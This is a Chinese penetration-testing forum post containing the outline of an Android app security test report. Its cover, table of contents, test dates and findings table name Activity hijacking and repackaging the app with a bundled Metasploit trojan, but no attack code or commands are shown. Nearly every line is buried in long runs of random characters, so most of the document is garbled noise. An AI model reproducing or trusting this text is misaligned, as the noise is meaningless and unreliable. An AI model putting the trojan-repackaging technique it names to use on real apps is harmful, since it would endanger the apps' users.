找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 原创-app客户端渗透测试报告之反编译捆绑msf马二次打包 ...
返回列表 发新帖
查看: 5377|回复: 0
打印 上一主题 下一主题

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2022-6-8 20:32:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
* v6 \/ p7 F. Q% e4 J 5 v7 e1 h) ~, U( j. D( D; f

s( ]8 X7 m- |3 m 6 d2 C# q }& o' B) F: k: y* g$ O
7 T7 c# E# u# _) w/ [+ t 2 t$ V" ]# q6 h0 g$ _5 X7 k9 w; T3 P

4 I% s8 L A4 \! M) Q L2 J* ?' m/ r$ F2 f5 N# U5 o: a
' V4 Z% I8 D6 {' P% Y$ X" v& K * G$ o! ~ ~ s9 g0 t# V2 X

' @$ O. z$ G7 |0 g4 v& H a$ S {% P/ N" e 文档编号:                ' K+ u* F, L& I4 T' @/ F( O) [* U: k6 d$ ? P' a% L3 X+ @" J

* E$ n! w: B/ d; ] $ J# `/ ^" i" S

4 p5 S; {8 J, `: g& ?/ K/ I& X, w D! g y( Q/ [+ m   9 }+ |! _& N$ s [4 S4 C 2 W$ P9 M6 T* Q

) `, W% A% S$ Y8 v2 h4 U9 s . u, F8 t% i( p/ v( S6 r. D

1 f2 `2 [2 Y4 w! D+ b+ g9 w . z. e) x! t8 v8 M( k9 [% M: ]. X   ( }' l( f- M/ Z' r& m$ W , v( p- l1 V% I/ H4 ?) p

6 m2 Q6 O- I$ i1 A2 q1 K! H! g& H/ u( G _3 |2 o

* a& w4 Z/ C) y t$ k. F + a7 ]9 v d o2 U% [: W   6 `! C8 @3 [4 W/ F2 d4 N- a8 x2 T 4 D: }6 n2 j' b: J; a" w! K" b

! r0 f# A- m: i % Y- K" Q9 c! n) O

! M5 h6 U/ T# g5 x Y# O% p/ y' I' w: b$ F) s4 Z   % E' @% [7 S2 U" e* t/ ^( O# A+ [( z6 z: i4 h% M- t; g2 C

0 F: r7 c% Y: f+ ~ ! f6 d1 D! q6 b; u0 {4 O

3 u h; H9 n& N; N+ h% g( E0 u7 U   " J- N+ R! w8 V! O- `' P , H( w4 ~0 @* n1 C. I

% m4 K5 y- v6 R' T9 U , [: G( s {# Y& t4 @3 U' ~, ]

' z: {( C: ?- O : Q2 k7 {' A4 a( h3 r8 m9 B 某某某APP渗透测试 9 G, T! Z/ ?, I& @- Q 0 r' m4 @. Q4 ^/ o

, H5 ^/ v8 l6 p 5 |6 U# @" N8 [& W

' w+ D0 g) z: \( q 6 z6 V# T2 y/ |   % h }- N g5 B3 _8 O6 a4 B- w% x+ J 4 ?1 ~4 ` \1 N/ T9 e. p

- f% N; z3 h5 t: ~4 E) u 3 F- F- Y4 _4 j2 e3 I. I

& ~ ^3 G! v; q; p S* } 7 b9 C7 J5 W8 a' `& u   + w' {' K7 m% B& a" r: D& Q) O/ g1 l- e6 y! W

6 ~7 j U% |4 a( `( K! r! P $ E$ i2 R; i7 e) ]+ A; G1 q, j/ i

, I+ i' U6 E F0 z 4 L: R* B7 M) S, T z" I! G   ' p' x% F9 r1 _ 1 I6 \) v$ o7 |' o+ s( F) e

) f( ^1 O: V( H9 G" X , i1 m2 m' H7 w/ N8 y

1 L H( q i6 U; {5 U5 S 9 {( p" G( i: K8 ]9 W5 @; t) j" I" o   7 }' \2 B( R( A$ _ / z# h8 ]# W7 M4 O. O( v$ M

% V+ \0 W" F# Z+ m1 A * B; \3 y+ E( Z) ?- V

+ i' H0 Y* y1 E, f% R3 { s " [7 o# s( Q! G# b* \ 技 术 报 告 - R% ~8 n/ r6 ]! G 6 t& p/ i% ?* D' @

/ g, U, E( Y% b1 v* o$ W+ H# M& x8 b u2 |4 \: f% u$ _' t% [

/ T% n8 T: t( c9 c6 L % I: h9 M- Z w$ g. h   ; q3 ^1 ^% i4 p( Q- a 2 h% a2 D8 t$ y4 n

# x) _5 ]1 O1 Y( J% H . i2 }1 z) P8 T2 g l5 E; B

) B. |1 p7 H Y4 n " f& R& O& m* N' o' y   9 f0 h4 F5 B0 r. y9 ]7 i( | 5 _ k* \1 | v6 p

, y9 Y) ^8 a* O4 F6 j7 Q* y* x; ^% p0 s* x P

, {/ ` y% L$ U4 x u! R1 ~0 a% [7 N2 T1 ?/ |9 z   & s* o7 ^2 h+ b! F + k( Z" I; x. X/ x1 r7 h+ V4 A

" J& w' O# K1 c6 H! v/ C 5 }7 f+ n Z# Q% ]; a2 S

3 h. _! N; i6 i U % `& J! z; b+ N5 R" P2 M   : O. Y0 h% q$ i6 _5 _: O, `- O' ` - s& G/ [) l8 n3 B

. v3 t9 G; B r4 g/ j * h+ }9 I8 G% @! R/ \

0 Y6 J+ J2 {2 Y4 [3 i/ q8 F. N. D5 m g3 k3 Y! s   & E% m. z$ x& |. R' s4 p/ ? . _8 f! S" C/ ?3 F, M

- w: G5 {7 _$ l4 t% j F2 Z6 ?2 s/ z& M0 C

7 D* L& V! ~+ A( y2 y3 K! P+ I4 m2 L+ ]( X) h# Y" Y a1 a   8 y7 y# b8 y/ Q6 o3 b# K: _5 ?, I7 \2 U- D

; a. U# [% n* B& y * m7 g8 I4 g4 i9 V) \; T

: e' s/ A! ]* i+ A, {/ ^ Z2 ]. E 1 E+ {6 H. N4 }6 p9 |5 w' w" B   / B& C! f) a2 z( N3 F+ q4 g: `8 n $ D9 }& g; G6 e5 P. W Q

* q) f7 Z4 o# f: K2 E 5 I7 {; U2 \/ \$ O. R

' n+ W3 K, Z& H4 o0 t2 v) `; A ! I: L! T$ b8 x2 b   , d. [3 m( P. d# m: c! _7 J, @# p% m$ w& F* ]5 H! [0 g

! k' R( d$ t3 Y# v' K' T * e: [$ L7 c4 i/ c w

, d( s" d, N# [% \: J , w, ~. L5 d$ B( F3 A   3 f9 X( J2 r+ _$ ^5 U% D% u: {; f: h5 a # c4 s( q- e. P- U

/ V* @! w7 q5 ?2 q * g. e; h; d! ?8 v( _$ B

# P6 @3 S+ o4 d& p! V: P2 b $ S; p& _+ n9 }# r7 F   3 z% d5 X: @* |! ]: z# H4 j$ X% O- L5 e5 z1 t- @5 {0 F: `

6 ~) h* m1 n" w. \- @ 0 L' c' H: X$ J, ?: w

/ v# y# u. w* T' z7 O 8 Q6 u: o) x$ i   # Y2 Q1 S% m0 w9 J5 o) ^" p x+ Z- k- P9 `

6 l% z& d$ O2 q . Z$ h) \. I# S6 U+ S7 u

, _8 \* a' m- n$ g* Y1 i8 @( u# P8 n1 T) C   , m0 m1 H, }4 k( G5 t" B& A 1 m+ y3 W* G/ `8 n9 }

# e" B' r" \% R* _5 N7 F( R5 m ' p/ Q& }* k1 U2 d: p

X4 ~$ f7 Q/ v, M4 y7 P* G - Q; n- x) e/ s0 D5 h* |5 n2 R   ! W$ v- H0 N' [; n# \, v 3 Y1 b) W6 B% u9 D, d8 o9 K

. D& y" ~& Q* j) j: y5 }% a : I+ J* C/ b. `! y+ s

# ~1 O* X! B: q 4 `9 A. H/ T" \4 Q( s& d+ ^   * k! f5 N+ [$ q* ]& h0 _ ' h1 \; j* @! n

) b6 \- e: [. S" Y . T/ W) ~2 c- u% r

4 J: G. m0 L. T0 C7 u( H1 h/ D7 H5 q: O   $ a2 B3 `/ [) e9 ~8 U ) T. {9 V. A- V5 P8 S' Q( V. R

7 Q* u6 U4 `! }7 \# [- U% d 8 z6 [6 z. [! m6 k# B' r8 @

n1 @' L; m! B9 B! C5 h& D! [" j   ' Q/ \3 D" `( k& [4 ~2 |& m1 ~ ; e% l4 a U7 H# @! {$ p/ c; h

: |6 D; W% b7 M% b 5 T7 l$ X! l& \# B3 H' C6 F" q

" Z7 p4 S7 Q2 c5 c# `2 \ 7 j5 S' M0 F; p3 W   2 m2 g) b! g3 B( T ' @& P5 z4 K9 A. T" w0 F. Z

$ ^# b0 I. g' P6 p/ A; k* q ( [5 V% T1 Z2 ^6 q/ ^- w8 }! }% t& J

7 B" T6 a' M$ F: X8 o* {/ S: A, K; f' {+ x; W   * Z2 d, w2 g+ w4 b& D; @ + h0 ?/ g' i. {& r

% S9 C5 l5 M6 _ o' ?- p$ @" x1 _

% ]9 A/ n: m' y; n 1 ~2 W1 a6 ]4 X0 D. R9 p& @7 @ 二〇二〇年 , r/ O4 G9 _2 {4 j & U0 X2 X3 j, e& q8 [

1 a, o: b8 d0 U0 ~& E" } 5 E* O* W/ R. ^1 N' O2 F- [2 w
$ J1 c- m, R; [% Z. R% Q3 Y% d8 f( g6 }
# M# ^. D0 t8 s/ k* }8 ^& K/ ^0 q 1 S: F, u% Y2 z # z& T( G# C9 X % w( E& u5 l7 ]8 s% Z
3 _1 ~5 q4 F+ U) Z" V T* A8 Y' U/ g+ J; d) X% A
% _! y$ k5 E5 p- E* ]% R7 o! y& r 1 q: w( ?9 O/ g) K% m
: w+ j* {. |- t$ X8 V8 S- b ( ~( T% p) I6 l8 ?+ s $ f) Z4 I# ^& F; f5 G1 \& |% O( x. w7 z/ d: r: d# p
% H/ M( F% y3 ~, u+ k( s M) W2 K' H9 u8 J3 W# ]( H }

, E$ f+ { r( D$ W. U5 R$ ^# \: i8 e 9 c' N3 `+ K' C 目 录 # k9 N& \: |. ]; ^+ U6 d5 F " T- ~5 o4 w0 N# f( i9 k0 }

; I' g! D J8 t+ g7 T3 `! s4 v: S9 B- ~, A4 e2 _5 h0 h, l1 z$ H t! l# J- {) b1 U ! @( v' X. y6 h/ f) C( @2 q

# B) Y8 ~1 r/ O7 | 5 K/ F' k ]0 j# n$ Y   ) \/ ^# Z$ e, t* k: l3 q ; _8 L& H' w7 J! K! X" y- e" B, R

9 R7 }5 x) R; p8 O& f 7 B1 u9 J& X( _& | O( K

& b2 ?8 W6 d/ D3 P+ w! `/ A5 R `: k; |: h 1 概述... 3 ' z9 \7 _+ \( g% F. L C5 b& y* A/ d& z) Q0 A

8 e. _3 L1 R! }5 C) B 0 W# M! a- l6 S! u' [

4 O% _1 K. o! o: a8 \5 }" j" V+ o. W& ], e7 J- y* B4 i 1.2测试时间... 3 . j; z, h* Q* X* p9 } p* x( ] 0 y/ s* C5 a9 H+ s' `

- R* J8 Y2 g- y# B9 z! d* n. C7 Z3 e) [

9 r6 Z) h* H* I( N. |# L( J+ B ) Y! [+ d: X. j3 A) |: m& u! p$ n 1.3测试对象... 3 ( Z- b1 i2 Y* [9 r9 J! m5 E" E0 E7 b: W4 c" t7 \

7 ^ G, r8 ^, { 9 _, v% b: u5 s6 M

7 p) P, J: n8 Y' r" L! C# I6 o" E8 _- [) b! l$ t& S: u 1.4测试结果... 3 1 F1 c5 L. x2 b- p" j0 P5 O " N$ `! L r: b

@+ m$ R& U, s* h# H1 C+ L) O% ? w* A! {

4 ?' i, D$ o2 g1 S* ?: q9 E; ~ * \- ? m0 I9 I! g% h/ _ 2 检测结果... 4 0 T- o) Y1 }" ]! ^+ S9 B, @, W$ h$ g, N: k

! ^. y9 P6 \' c- H# B 2 J- S5 p+ A2 I

2 |9 S3 \7 k& F ( j h7 i* N" u0 H# ?4 ]: I 2.1 某某某... 4 * n( V% X( L7 D* F( X9 {3 D" R3 S8 \1 w, C; E1 ~% g

! R( ^+ @! s4 Y$ i: ~ & @% |6 b# O/ J

, a' O. r' R8 T% ^) d $ O1 H8 A. o6 `' H+ c- q- {; [ 2.1.1检测目标... 4 ' g1 C$ m' i4 z. f% I; l d( Q8 Q1 s

4 E2 ?' G |: H ! b+ c% Q$ [4 I8 }+ ]1 k, ~9 I

! e3 @: n3 Z4 b$ L9 t- F 8 A1 R& r) D! m/ d- _* G8 E 2.1.2检测结果... 4 % O8 N5 Q& n- _6 @! r" P ! y# t& M8 l) A2 |# N+ }

% m- c6 C/ x( O1 c" \0 W! C4 C+ s , f$ O; J4 \& E+ e

' j- p5 x& X( ~1 F4 F. l' c* c7 _7 M X" } 2.1.2.1. 4 " J3 w5 P; v: K ; G! j! k8 ~! N1 X& |

5 M4 x& s- J/ b $ a4 u! o$ p) m$ ^

( y; c$ F9 r& b' u Q / X$ Q* r8 i* r& e9 `8 ~- [1 R 2.1.2.2. 6 9 b. p' P2 G R+ R: T z7 E9 @; o% k; \; ^

+ a( V* c# F7 o$ {$ {. B. Q 5 v* q# ^3 c; S7 Z

' j4 Z) ]8 A' e8 z% T8 j' O/ Y# ?$ h9 y g$ n6 j, i 3 l; l& X% J* O& t+ k1 H$ V, D7 G

- d" [( ^$ B/ K) I0 R3 v ! _+ \2 C& w6 P' h: r. y+ }. {9 O7 m3 A, U- t1 E& D / `' |7 W6 i# y$ K; W' S
" f# d: ]9 t8 c" p, f2 q; ? 7 ^! j6 M h5 h1 G% r: @
; O/ O4 H6 k' \8 C2 X- e; E q6 R) N a+ C& A" y$ \ , O* j" f9 \$ m% M. R2 B 1 G0 ^# D5 o; \4 i; P2 ~- f4 x

, H; J: r$ S# X y / W5 Q9 V- X5 z 1 概述 ! M+ z' ~: `: ` @- `) S3 w2 L, V g2 g

$ j# N1 e9 m# M& t, S, S- P& Z5 p 4 A1 O. ?$ q% i% j2 {: V; H- b. O

6 |. J3 h/ j' l0 N( ^0 C/ S) b8 O5 M# P7 @$ c2 r 1.2测试时间 6 j4 C4 V. \, o- f$ W6 M2 J$ V0 p2 Q % q. W4 b. u- X+ n3 z

% f! S" I. y$ w" |# h/ K 1 F1 Y6 L) `+ T ^$ \ 8 }! y6 K$ f( q/ H7 p4 F+ y _3 ^7 {0 b0 c5 d2 R, S( P/ x: ^6 _6 L0 P7 M* M7 Q( |% ]' H7 `2 R1 ?1 L% K3 M; F1 Z" Z0 I( M" s6 J9 e0 b% F, {9 J j5 q: B# E1 r, G- ?$ _" K- G+ g$ w1 V y+ E" F, r* e& {2 @! D$ d) o% J/ I4 d# t1 x, r/ o6 N: x9 P. d( s& L& Y7 n' W# e+ d& p3 o9 h9 k: K: Q; E9 Z, Y0 o; u- G2 ^7 L8 [% q, k$ ?- d/ U1 z5 |/ R% e; J% q- o8 e" |9 l6 L% C4 K- p2 i/ V. c, O7 V( t7 A- f* ]/ i$ } h& M! C+ L' X$ S' j$ y& z; C% q3 x$ s+ j2 R$ e) m6 u, a% I8 B- b! M9 ~1 r" g3 _5 t& i/ |7 W c% ^9 m6 W% W9 K1 N- b7 T% N5 j' Z! R! e9 l0 ~6 s6 N* {, ?3 I1 ]2 Y# U) \0 h5 [$ P2 H! S3 R. C& G& o2 Q1 J' V" M* V% g8 O, w0 h6 ?- M0 U! g# U/ |, o) @5 [6 o. E- u* i9 Q
, I3 n8 P$ q& u& q2 P7 g ]) Y% N3 |% m% d( D+ f

* U7 F' U! x+ {* t* w" q 4 d2 Y+ ?2 U- f' t- a8 n 渗透测试时间 , r$ }& e N$ |# f$ q$ q 7 T$ N+ r) p& j) M

Q1 m) O# j# L8 k1 v 3 x' L4 U) e2 ~7 j, C
# Z. F7 v; X% ^' @: d- G( i6 |. n+ w( R/ K% g' O

0 K; M2 h/ L1 y. r! y( e# ]9 F. _3 J 起始时间 : y5 A. Z* Z% O' c4 [" p3 C& k 1 F7 C% H. V8 b; p! B8 a% U

2 m& C" b7 |/ X* n 5 ^) j# k0 a8 V" G( A4 Q9 w( o 		( G. Y$ \) W6 L6 \7 c; n/ S 7 z) _, B0 b' k

1 q# c5 h/ P0 E! L7 K3 }8 c5 V# N7 O' y/ ]1 h% v% M 202046 , e. Y! C3 D6 h* K% X$ F" ~$ I ( z+ J; t# e; Q6 Z+ C

% J* \& S2 \9 l* b7 v6 R" l 9 ~) e( d' w# f% p0 n
9 E0 f9 n6 T7 ?! S ' w `' e; ^* p* M

1 \. Y4 V, `7 X7 w * O% j. ?- r( W; D; H/ { 结束时间 1 X8 c8 I; _9 d/ x8 O2 W6 ^1 {) ?6 V 4 b8 f/ s$ A3 f. g+ W/ b$ a

; s6 {5 o4 k& R, @, r& E3 y3 `, A+ j4 d+ J( X; I2 a 		2 `4 h2 D. I4 t) X9 A/ | # }) ~3 S' o& ^- q3 N) f$ u

. a* t4 u0 x+ F9 `8 r/ Z/ {% W0 m* y1 v' } 202049 6 s& X# ?2 m; @, z" F) @' q/ }( Q

t' h! c |0 d2 a- {+ Q 6 t% @, E0 o; R6 ?5 S
8 s9 M0 o- ~) X7 t1 t$ x5 j4 {9 U7 ^+ e

% V. w2 T& ]( T) Z0 a2 u5 ~% W. p5 o) j$ `3 L# l" B 1.3测试对象 5 p' U4 G$ ]3 u" X' K& _ ' N0 _% W5 v$ g' S

, `& `- v+ N8 ~/ F$ B5 e9 y0 c5 Z# c& l2 m ^

: ^2 }6 t) |9 G- u- B! N% }+ p0 f" C( f$ J9 o0 V 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: 7 ~7 [* {/ p2 x5 r* z0 L( E % c% \+ v2 Q# ?7 }

: A9 v m$ L3 ?( r B0 ]# L0 L8 R3 N6 m* r) C9 w# T

: U0 w1 ^) s6 `2 M0 F6 k- E 7 F" C0 I$ Q2 B5 s/ c7 m 1-1 检测对象 3 s- w3 T# K& w- b" u' r* { - O$ R# N! ~2 [ A: h9 e

; |: K# g) M9 u+ n# P ( l& Q% u i' C. v + s: s4 B( t( r' u+ I. a7 l* ^5 t( M0 a. @- X! M8 Q s9 Y, \4 a" j/ A% t' k; G7 [9 ^6 |/ K. K7 F& S( A$ B( n+ q* Y" ^& }) t; J" ^+ h, U+ `) b+ o4 D; i2 Q8 p. i, w1 [5 x7 Q/ l. C+ f% |/ P2 Y* N! @7 r( v& E+ J- _) ~1 o9 K, k3 k/ c& e l2 B+ v+ w2 d: U2 [( Z/ Z* b( `! g. t/ p) s9 o# }$ t- s$ Q, N0 P3 W) n4 A9 g" y% w- |9 Y- x) ~5 s& @+ | I/ x& D# \7 B+ h% x2 B) D3 f& Y3 ^& R, `3 l! s3 I5 o) l; C; q2 T. B C0 }/ c/ F7 ?7 H2 F2 o& c* H+ |7 E% L2 {$ z: {7 p) @* i' p# |6 r' F/ E1 ~0 C' H! I. t/ q# j, R4 |4 k9 R$ f9 V# b0 ~4 |3 J' f! ^( p) l* W/ b- q4 E0 B# g# Y3 L" q7 a5 [( y9 o. t( F/ }+ T/ }4 l: }7 u, `* w& r0 O8 W, Z, `- V$ ?% T& Y' F2 r; j' l* K) q2 M9 n" N; d* E& d& G4 v! Q: _' I- d7 f! d$ y5 N- I' a, c
7 f* u" p8 Y* U8 J( U; X% G # E! W+ c B! i. {9 c9 [

7 |! x6 B, ?4 T3 \ / D/ _" d& B3 f3 D 序号 4 }9 s% y% i; Q1 a 2 A, e: F! I" p+ I/ y

3 O( b) P1 i) k1 z5 C1 c/ U , K$ _9 U5 M3 V5 t* I 		; e7 j+ N( P$ F" h- }) {9 u9 I! o( L/ w0 W

# l- a1 ~6 q- V0 \6 Y r9 c1 V& L/ E 测试对象 2 c5 F. z0 A7 n% E. K% S : \& z% G+ e9 b1 I3 B+ D4 l& b

1 U/ c4 s( B' D" n: z 0 s. D3 j a8 W& C& s 		7 c+ H$ e' Z" C- J8 S ' W" L% p& I- S. ?

! ~2 j# x0 t5 c. F1 d& B" W5 ~8 l , ]' c& c/ m5 h7 H; G6 e 测试地址 " \( `6 i, Y; G. J6 J9 W 6 B- b* y: |, |3 q( R# O

/ n: r! v7 C }4 D6 Y; _3 {8 v( I# o. s0 R; U! G% z) M 		. B4 d4 t/ {/ k5 V - ^- i. P8 M+ s- s

. z! P' b, n5 H+ C7 u: l3 o5 r 3 e2 Z" {; @, h" Z4 |) q& `; x9 v% M 安全漏洞 4 Z0 f) t/ c! _" } 6 W {" e0 {/ w3 S$ @' N

" h; _; B( n8 N0 q$ u v 8 Q- v* y p, X9 u- G3 s* `
$ j8 N4 ] B* _$ q$ H' B' S 3 ]: r0 a7 ?0 s: A1 o; q+ i2 X3 B

# R9 a1 p5 k- H* y/ v% K" T 1 K& o! d7 T& ^( d. \) E ?- R 1 8 z {& `" Y6 q1 O8 ], ? ( J5 z/ J4 X$ T3 n1 \

! ^- e& p' E6 H/ C) a; Z) i: k" S: q* X/ C8 X 		$ v' O/ X# B" ~* v' S% y ! {9 i& H8 S& m% X a2 d$ t3 p

2 v( k7 [! i$ z( ?9 `. @/ N# W & R0 d3 O& A: H, u+ E! x% G 某某某安卓APP 4 J' I/ R1 m2 T* x' [! s/ y C. v 0 q5 [% e _! ?/ r

* i3 D1 v( j" e0 R# W0 S! E0 \: V. y8 K# d2 r7 w 		- R% q# I8 a: `6 f; R1 e _/ n " ~; [+ z4 A& Y

5 G3 |, X; Z; ]' ^7 L& O$ T P3 W; `8 f5 e4 L' \5 r   0 X, i' y& I7 |$ J0 n 6 D; [8 T3 c: C8 m* [

- Y7 b! y% M T, e E; L4 L% j& s- L+ T 		, @) Z9 V0 j3 l5 C v! k. `% D% f0 u# y2 Y" o7 s, c6 _, V8 b5 g

$ ~3 B8 I2 x# k, r9 p / a0 I! I% k5 n3 _6 F+ g* N X3 e 2 6 x& A2 b! t, f. |% I ( n& _5 A( H. q$ d) ], f( F+ x: b

A9 w, g) q' [+ Q. _8 w' B 6 c+ s$ B# @: ?/ a1 m
! B ] a3 o3 z9 [2 b/ a7 |; { 7 O# B$ v% e+ x5 F6 e6 D

4 p6 f; a# r8 U5 y5 c 5 ?2 [& m, i0 Z. n 1.4测试结果 ( X( N9 G, t' h* x# u7 D 6 m; `! o( {( g4 l- p

5 `# w$ `- w- X- Y; Y; O , U7 \+ A% b) Y* b) C. w- x

8 a+ R+ Q& P! T; o I & v0 J5 J X/ J 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: - C# A/ q' m' V0 f7 i" S, Y+ t ! T D t8 G7 y& i- q/ ]

! v* T" W$ I1 H) j8 n# A9 b , n) e9 Q, @: Y( W+ w# ^( `

. m/ s; m R3 d6 ?+ G ( ?% q. I/ W0 F   0 p( [! t+ V. t / w6 X7 a1 }5 N( ]6 i- ]! s* h. h3 V

) }- X6 h1 L: A8 x9 V7 b K. e( m5 ^" f; B* O u; O
" @7 A. U/ O4 M" S& P0 i+ R4 Q* e( ? ) Z. J# ^2 ~7 ] H: J4 ]2 U 7 R. n! O+ h9 T7 v& h) a" U9 N& s, |% \ G# U. a- w, b4 X$ s& j. r# R0 z, M; W+ ]5 z( U4 m! I/ B: Q; d' M- X5 o" \2 {: y3 M$ i( m( N+ N5 b$ I0 _) @' H) J. k( ]7 R {8 j2 n: G; P& `# m/ z6 v! f5 K, G7 j/ e2 o/ R# b. C [% F5 K8 g I% D& s( i4 r2 [/ f/ [$ i0 a s8 ]. X2 b* |6 _# W+ M$ l* g0 m C% p+ U7 r A, N' d: B0 r: @/ `% ~) M R! v L5 o! {( W$ F+ M6 b/ n* [- R6 a9 j# ^2 i7 X$ C4 P4 S% N( P" P/ o% L, ? Y @- m/ s: [4 v4 J- r1 E" f& S) i6 o# ]6 \5 V1 t$ t4 F) m5 g8 n p7 s# _8 H% ~6 _5 `5 ^0 h7 B; ?5 `. K, {- c; Q; w+ i; @ f- M _, w* H' G& W0 j4 D" v0 s9 x5 j$ G: v( J( m& e# j9 k% p z/ Z- k" }( ]" d# K2 m: w6 d: a( f8 ]5 S# ]9 ~1 T7 W( ^; q) o! L# w. f ~4 y% b, H2 Q% |) ~) B5 y0 t, E( z# j( f! j s0 V# T: g$ d, j# K. m8 K* N7 G7 @7 V: j- H5 w% c( o( O- i* A* E; l4 ]9 v$ O9 L1 n% Y, X+ T2 Q3 |2 M8 |1 q* k9 w5 T, G; w, V( \; h6 [- A1 P& q! a, C c4 l6 ?9 i$ W9 ^* r" k2 l1 j9 w+ ]% R) L# ~' P# p& C% k% q) H2 I/ J9 n: C# P/ q+ |% \4 D% Q2 l% O) L( O& J" M% O/ |! a i7 N& b( c2 B1 }5 _$ F1 _- B. a$ |; S! A+ _0 A1 b% X' p0 U6 }# u8 Q1 P# Q+ z. ]1 e) n3 p% c- a% N8 A# ` J( ~% p& i7 K% [; L/ \$ J7 g/ \, x ~6 K. k9 V2 o `; i7 D G$ G* z1 T, N1 J1 z: T( e) _* E9 H
/ q1 `+ X7 k P8 `7 Y" R- m) v3 G: W5 s' J0 Y3 Z/ \$ R, J% Z

) |/ l4 I, y* S7 L: {( N0 { . V( z0 z3 I K) t, S2 V 序号 1 W3 c. D K, D( L& S3 V 8 m& P9 \/ z3 l# M9 z) W/ H

- a8 _5 E* g2 Q/ e, ^( t & \& j6 m- O# G$ c6 A5 K4 ^ 		' v7 G/ A" W! q$ x : {+ F: F! \+ Y3 s* e; u |' H

T8 y5 X5 L8 Q) S' Z , S6 z6 M5 D0 _0 {6 o# z 系统名称 # P! _. B( g$ o- M* V1 Z( Y" F" Y! @' N% {( j

2 K6 n) e0 z; M& r5 ^; I5 h, M" N5 ^2 t7 c# ~6 C! W- \ 		) X5 h# U! @# K6 M : `5 N8 L" m$ _$ K* u" s) v! }

, n5 U: u% ~5 o) y, y ) ?6 ]0 z/ z c4 g1 a 漏洞名称 . P* _5 X l7 h" j- m ( r3 l9 L0 ?! v5 B" T, I

9 l, f, t& F4 L9 c/ Q' i8 P# a; a. J% v$ i( i J/ h r! @8 s 		f6 Y, J$ V! P8 T4 r/ Y, X4 J! @, |& n/ P/ Z9 \2 E- K9 P

! V- S: R# k5 A9 k 3 s( B* ^1 f% s" K& y 漏洞危害 1 t3 Z @! n: o$ y % t* f6 B3 N8 y8 m$ {6 C

3 ~) x' ~4 I/ l$ D" O0 h - a+ Q7 k" ~) O9 Q 		7 }! ?# u/ u' q. `1 b( z4 A* _ 8 }- o3 w+ R3 }/ h* `1 c

: C* P+ l- d: O- U , F" Q' `; C( ?% T 修复结果 ; e9 G+ H) i# J+ G4 O; z& @& G" x; t+ k/ R5 q4 M0 b. @

% u: R1 G2 c! R& | 5 `8 W) w' f% P6 j
9 Q7 G7 v$ f' r 8 v, L$ K' X! z, ?, G

# l6 U# z5 m S( J6 ]& W3 [1 ~6 U5 Q8 ^ 1 5 g& r" |- M, H# a) `/ w" C6 y" Y& g2 P

% s: p Z) m2 C5 V) F- y1 p) x3 {& D; N6 R! z8 w5 A 		: O p; D0 I2 h i ! ?. h8 `( B8 X9 [" [

# p2 R, ]) @' S. N8 r; v* m & |% `5 [. ]5 V- ]7 h0 H 某某某某某某APP ' d: i( v2 {& h3 `6 R. s& ]. f1 C h# X H% _

% o8 i x+ _0 d 7 G" b. Q$ i5 N' M$ o& L* N 		, }1 B* k9 P. |$ R8 h% u+ q/ y* ^# |. ^* P

' l9 o4 y+ Y; k9 j9 r . T, V: Y" \* i, G/ h Activity 劫持 # [& T* d U [3 Z . X+ a. L) j* U6 H0 R

7 ~$ c/ x i& w* x4 ~$ |" s5 l9 k) @9 h+ l* R

0 q, P* v7 v# w9 i. p; {& N9 x) z1 l( s+ d. t) [6 s' L   ! E. U8 Z& o! S) P! {8 \/ g2 M7 w5 ?( E. p5 d/ g

4 m- `9 i/ b4 @8 F" ?" @) A. i( I 		4 Q8 t! |) O2 y- p( o, ~ 1 s. S; B9 \3 M, i! e) M: Q

: v- j, P, J; I6 l- w% i" \! R0 |; E9 C" y' ~ 9 N9 ?, F9 G* C8 O, C6 v 5 w+ {* u! z& A% z4 T) P

/ h7 z/ O4 R) ^0 k q' V9 c; u1 _7 \* U0 y" N 		& M( M1 ^, k: _% ], q! l& ~# Z! D; v2 t) z/ Q7 f, s

5 C' C; m) O% ]* |( l / R, e2 H6 F7 Y) e   5 I2 G" v C" g 2 I8 b, o+ T( ]- f5 @( `

0 x# ^/ z# n& v% d' t8 Q0 J) W' X* A! w. k6 R" d7 i6 @
9 ?% E* v2 W5 D( n; {- I$ j; a % `2 ~4 u+ i% X/ `4 [" Q7 ?

+ T8 i, i. \- G* t( r* v 7 ?' K+ i6 a. H 2 8 i/ T$ j8 f9 v0 }: h 2 z! i' _, M2 i, q: Q9 b

. x* G5 s% U0 Y. ~, I / D1 O9 e9 f" I, J 		7 C, _1 y/ u2 z 9 s) y- K+ x9 Z/ f5 G3 Z' e

9 J3 U5 n1 B; ~7 r; J + b1 m) K5 @# q6 K! Y 某某某某某某APP # q1 ]' N4 {+ y 4 q+ v$ Q! A* d. A

( h0 Q4 p4 L6 Z0 A* M% k : q& [/ T9 c1 c2 F6 n 		6 S( l7 \& [* s- L7 ]2 M" }$ p5 u 7 R+ ^8 V" b8 F( g8 X

7 m5 C0 w7 J) H9 p( b+ ]% ^ F+ J ( T+ l6 z7 f% B 反编译二次打包捆绑木马、篡改APP代码 , K1 ? A8 c) c+ L t: C/ K/ s/ @ u$ Q. k5 U* N) V

4 _# f r+ W) I0 Y ( N! `2 s3 X$ I; ?9 C8 D; { 		% C, Q6 N. j% K! [% ~3 S; {' W* l( U5 ]- y! M7 G

+ Q& ^ g) v! W( w- A 9 k+ K2 Y3 f' v+ s& H( O - c6 s5 \8 E5 h6 b+ g. H/ i& i1 H$ S0 A( h* n

4 [- L& S' }" e" m3 M* Z " \2 w) a6 \% q7 p& O* h$ K 		+ A v4 C0 m! v3 @* \5 V0 @ m% Y2 Y: G% T; |

/ [! a3 P- l& B3 p) C / t" S9 J. a3 J- d* k* N1 G   . h& c" S- W9 V0 M; K : l3 u, a- D5 U8 S. ^. Z2 q

" _/ J/ i( ]) G% j/ X 5 v; r8 z4 y, C% Q, Q
! F7 U; }6 a; e( [- Y7 v+ b/ U% T " E- w" @; Z0 R" Z7 X. {
4 m; K& n1 p/ t7 ` ! Y" d4 `1 s# `9 F, O0 Q

- M# R# F& \- @5 \% ?# [1 l3 q' L# @( g, F+ V( o# [   ' m$ H6 F- C0 ]' y1 X : w5 E. D3 C$ W+ o* A* s m1 M

